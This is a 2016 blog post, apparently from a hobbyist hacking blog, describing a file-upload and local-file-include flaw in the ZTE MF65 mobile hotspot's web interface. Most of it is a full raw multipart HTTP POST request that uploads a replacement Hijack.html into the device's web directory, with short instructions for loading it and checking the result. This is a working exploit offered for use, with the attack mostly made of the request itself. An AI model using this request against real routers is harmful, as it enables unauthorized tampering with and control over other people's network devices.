Sunday, 12 June 2016

// Zte MF65 Local/Exec File Include //

 

##  File Upload/Exec LFI ##

hey new one, demonstration of web server executable includes

use post to send off this file, this file has our basic index re uploaded
without the service providers logo

use hijack.html to load the new file, it may fail it also may say it was a success without actually working use with the lister bash script to check the /webs folder


POST /cgi-bin/web/Hijack.html HTTP/1.1
Host: Your IP
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935
Content-Length: 10299

-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time"

2016-06-12 04:28:43
-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time_unix"

1465705724
-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="filename"; filename="Hijack.html"
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta charset="utf-8" />
<title></title>
<link type="text/css" href="theme/common.css" rel="stylesheet" />
<link type="text/css" href="theme/chosen.css" rel="stylesheet" />
<link href="favicon.ico" rel="shortcut icon" />
<meta name="viewport" initial-scale="1.0" />
<!--[if lt IE 9]>
    <link type="text/css" href="theme/IE678css.css" rel="stylesheet" />
<![endif]-->
<!-- link href="theme/slideshow.css" rel="stylesheet" / -->
<!--[if lt IE 9]>
       <script type="text/javascript" src="js/lib/html5shiv.js"></script>
    <![endif]-->
</head>
<body>
    <div id='msgOverlay'>
        <div><span  id='msgDiv'></span></div>
    </div>
    <div id="mainBody-fluid">
               <div id="statusBar" class="span8 side-right margintop5">
                    <span class="statusItem" title="network_type" i18n="true" id="networkType" data-bind="text: networkType"></span>
                    <span class="statusItem" title="network_provider" i18n="true" id="operator" data-bind="text: networkOperator"></span>
                    <span class="statusItem" title="spn_title" i18n="true" id="spn" data-bind="text:spn"></span>
                    <!--<span class="statusItem hide" title="ota_title" i18n="true" id="OTA" data-bind="visible:OTAStatus">
                        <a onclick="return showOTAAlert();">
                            <img class="paddingbottom6" src="./img/update.gif"/>
                        </a>
                    </span>-->
                    <span class="statusItem" title="signal_strength" i18n="true" id="signal_strength"><i class="signal" data-bind="attr:{'class': signalCssClass}">&nbsp;</i></span>
                    <span class="statusItem" title="connection_status" i18n="true" id="connection_status"><i class="icon_connection" data-bind="attr:{'class': connectionCssClass}">&nbsp;</i></span>
                    <span class="statusItem" title="sms_unread_count" i18n="true" id="sms_unread_count" data-bind="visible: smsUnreadCount() > 0 || showSmsDeleteConfirm()" style="display: none;">
                        <a onclick="return gotoSmsList();" href="javascript: void(0)">
                            <img data-bind="visible: smsUnreadCount() > 0 && !showSmsDeleteConfirm()" class="paddingbottom6" src="./img/sms_unread.png"/>
                            <img data-bind="visible: showSmsDeleteConfirm()" class="paddingbottom6" src="./img/sms_full.gif"/>
                            <span data-bind="visible: smsUnreadCount() > 0, text: smsUnreadCount" class="smsUnreadCount"></span>
                        </a>
                    </span>
                    <span class="statusItem" title="sim_status" i18n="true" id="statusItemSimStatus"><img data-bind="attr: {src: simStatus}" class="paddingbottom6"/></span>
                    <span class="statusItem" title="roaming_status" i18n="true" id="roamingStatus" data-bind="visible: roamingStatus() == 'R'" style="display: none;"><img class="paddingbottom6" src="./img/roaming.png"/></span>
                    <span class="statusItem" title="wifi_status" i18n="true" id="wifi_status" data-bind="visible: hasWifi"><img class="paddingbottom6" id="wifi_status_img" data-bind="attr: {src: wifiStatusImg}"/></span>
                    <span class="statusItem" title="battery_level" i18n="true" data-bind="visible: hasBattery"><img  class="paddingbottom6" id="batteryCharging" data-bind="attr: {src: batteryPers}"/></span>
                </div>
            </div>
            <div class="row-fluid marginbottom5">
                <div id="themeContainer" class="span12 side-right" >
                    <span id="themeSection" style="display: none;">
                        <span class="colorBlock default" data-bind="css: {active: currentTheme() == 'style'}, click: function(data, event) { themeClickHandler(data, event, 'style') }">&nbsp;</span>
                        <!-- span class="colorBlock blue" data-bind="css: {active: currentTheme() == 'blue'}, click: function(data, event) { themeClickHandler(data, event, 'blue') }">&nbsp;</span-->
                        <span class="colorBlock mac" data-bind="css: {active: currentTheme() == 'mac'}, click: function(data, event) { themeClickHandler(data, event, 'mac') }">&nbsp;</span>
                        <link data-bind="attr: {href: themeHref}" rel="stylesheet" id="customTheme" type="text/css"/>
                    </span>
                    <select id="language" class="marginright10 hide" data-bind="options: languages, value: currentLan, optionsText: 'text', optionsValue: 'value', event:{ change: langChangeHandler}"></select>
                    <span id="login">
                        <span trans="password"></span>
                        <input id="txtPwd" autocomplete="off" class="require" type="password" maxlength="32"
                               name="txtPwd"/>
                        <span id="txtRequire" class="colorRed hide"></span>
                        <input id="btnLogin" class="btn-1" type="button" trans="login"/>
                    </span>
                    <span id="logout">
                        <a id="logoutlink" class="logout marginright10" trans="logout" href="javascript:void(0)" data-bind="click:logout"></a>
                    </span>
                    <span><img src="img/hui_spe.png" width="3px" height="40px"></span>
                    <span><a href="#traffic_statistics"><span class="index_toplink">My Data Usage</span></a></span>
                    <span><img src="img/hui_spe.png" width="3px" height="40px"></span>
                    <span><a href="MF65_Help/MF65%20manual_2.2.htm" target="_blank"><span class="index_toplink">Help</span></a></span>
                </div>
            </div>
        </div>
    </div>

    <div id='nav' data-bind="visible:showMenu()"  class="row-fluid">
        <ul id="list-nav" data-bind="foreach: mainMenu" class="span12">
            <li data-bind='attr: {mid: hash.substring(1)}'>
                <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
            </li>
        </ul>
    </div>
    <div class="row-fluid">
        <div id="mainContainer" class="row-fluid">
            <div id='left' class="span3" data-bind='visible: secondMenu().length > 0'>
                <ul id="leftmenu" data-bind="foreach: {data: secondMenu }">
                    <li data-bind="visible: false, text: $root.getThirdMenu($data)"></li>
                    <li data-bind="attr: {'class': 'menu-two-level ' + hash.substring(1) }">
                        <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
                    </li>
                    <li data-bind='visible: $root.thirdMenu().length > 0' class="hide">
                        <ul class="third" data-bind="foreach: $root.thirdMenu()">
                            <li data-bind="attr: {'class': 'menu-three-level ' + hash.substring(1) }">
                                <a data-bind='attr: {href: hash, trans: hash.substring(1)}'></a>
                            </li>
                        </ul>
                    </li>
                </ul>
            </div>
            <div id='container' class="span9 paddingnone"></div>
        </div>
    </div>
    <div id='footer' class="side-center">
        <span trans='copyright' class="hide"></span>
        <span class="copyBg">Click <a href="http://www.telstra.com.au/account-services/" target="_blank"><span style="text-decoration: underline;color:#fff;">here</span></a> to access your Account Services</span>
    </div>
</div>
<div id='loading'>
    <div class='header'><span id="loadMsg"></span></div>
    <br/>

    <div style='text-align: center'>
        <img id="loadingImg"/>
        <div id="loading_container"></div>
    </div>
</div>

<div id='progress'>
    <div class='header'><span id="barMsg"></span></div>
     <br/>
     <div class="progress-content">
         <div class="progress-bar-container">
             <div id="bar" class="progress-bar"></div>
             <div id="barValue" class="progress-bar-value"></div>
         </div>
         <div id="progress_container" id="progress-prompt"></div>
     </div>
 </div>
<!-- confirm content -->
<div id='confirm'>
    <div class='header'><span id="popTitle"></span></div>
    <div class='icon'><img id='confirmImg'/></div>
    <div class='message'></div>
    <div class='promptDiv hide'><input name="promptInput" id="promptInput" type="text" maxlength="25" class="width190"/><br/>
        <label class="promptErrorLabel colorRed"></label></div>
    <div class='buttons'>
        <input type="button" class="btn-1 simplemodal-close" id='okbtn' trans='ok'/>
        <input type="button" class="btn-1 " id='yesbtn' trans='yes'/>
        <input type="button" class="btn-1 simplemodal-close" id='nobtn' trans='no'/>
    </div>
</div>
<div id="buttom-bubble">
</div>
<script type="text/x-jquery-tmpl" id="newMessagePopTmpl">
    <div class="bubbleItem ${report}" id="${mark}">
        <h3>
            <span trans="${titleTrans}">${title}</span> ${name} <a href="javascript:void(0);" data-targetid="${mark}" class="bubbleCloseBtn"></a>
        </h3>
        <div class="bubbleContainer">
            <div class="bubbleContent">${content}</div>
            <div class="bubbleDatetime">${datetime}</div>
        </div>
    </div>
</script>
<script type="text/javascript" data-main="js/main" src="js/lib/require/require-jquery.js"></script>
</body>
</html>

-----------------------------13738844281409151800268458935--

No comments:

Post a Comment